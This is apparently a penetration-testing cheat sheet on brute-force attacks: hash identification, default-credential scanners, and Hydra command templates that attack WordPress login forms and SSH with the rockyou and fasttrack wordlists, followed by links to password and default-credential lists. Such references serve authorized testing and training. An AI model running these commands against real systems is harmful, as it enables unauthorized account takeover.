Brute Force
Hash identify
# https://github.com/noraj/haiti
haiti hash
Test for default credentials
# https://github.com/ztgrace/changeme
./changeme.py example.com
# https://github.com/x90skysn3k/brutespray
See documentation
Hydra
Hydra is a command-line tool for online password attacks, such as website login pages and ssh.
General format for website attacks:
hydra -L <username list> -p <password list> [host] http-post-form "<path>:<form parameters>:<failed login message>"
Wordpress
Attack WordPress login page with a known username, success parameter S= instead of failure parameter, verbose output:
hydra -l [username] -P /usr/share/wordlists/rockyou.txt [host] http-post-form "/wp-admin/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:S=http%3A%2F%2F[host]%2Fwp-admin%2F" -V
SSH
# default
hydra -l root -P /usr/share/wordlists/fasttrack.txt [host] ssh
# no standard port
hydra -s 22022 -l root -P /usr/share/wordlists/fasttrack.txt [host] ssh
# with a username wordlist and ports
hydra -s 22022 -L userlist.txt -P /usr/share/wordlists/fasttrack.txt [host] ssh -t 4 -v
| URl | Description |
|---|---|
| https://nordpass.com/most-common-passwords-list/ | Most used password by nord vpn |
| https://github.com/ihebski/DefaultCreds-cheat-sheet | Default credentials for dozen of applications |
| https://cirt.net/passwords | Default credentials for dozen of applications |
| https://forum.ywhack.com/bountytips.php?password | Default credentials for dozen of applications |
| https://github.com/noraj/pass-station/ | Tool to search for creds |
| ## | ## |
| https://github.com/ignis-sec/Pwdb-Public | Mass list of passwords, based on data |
| https://bit.ly/3nFUfJG | Rockyou list 🤘 |
| https://github.com/1N3/IntruderPayloads | Lists used by burp |
| https://github.com/WillieStevenson/top-100-passwords/blob/master/password-list.txt | Top 100 passwords |